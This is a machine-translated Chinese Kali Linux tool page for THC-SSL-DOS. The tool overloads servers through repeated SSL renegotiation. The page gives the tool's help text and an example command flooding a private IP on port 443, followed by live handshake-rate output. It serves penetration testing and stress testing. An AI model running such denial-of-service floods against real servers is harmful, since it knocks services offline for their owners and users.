THC-SSL-DOS包装说明

THC-SSL-DOS是一个工具来验证SSL的性能。建立一个安全的SSL连接需要的服务器,而不是在客户端上15倍的处理能力。 THC-SSL-DOS利用这种不对称性通过重载服务器和敲它关闭互联网。此问题会影响所有的SSL实现的今天。这些厂商都意识到这个问题,自2003年以来该问题被广泛讨论。这种攻击进一步利用了SSL安全的重新协商功能,通过单一的TCP连接触发数以千计的重新协商。

资料来源:https://www.thc.org/thc-ssl-dos/
THC-SSL-DOS首页 | 卡利THC-SSL-DOS回购

  • 作者:黑客选择
  • 许可:GPL第二版

包含在THC-SSL-DOS软件包工具

THC-SSL-DOS - 压力测试仪,用于SSL握手
[email protected]:~# thc-ssl-dos -h
     ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] <ip> <port>
  -h      help
  -l <n>  Limit parallel connections [default: 400]

THC-SSL-DOS用法示例

使用100个连接(-L 100),防洪目标IP(192.168.1.208)和端口(443):

[email protected]:~# thc-ssl-dos -l 100 192.168.1.208 443 --accept
     ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err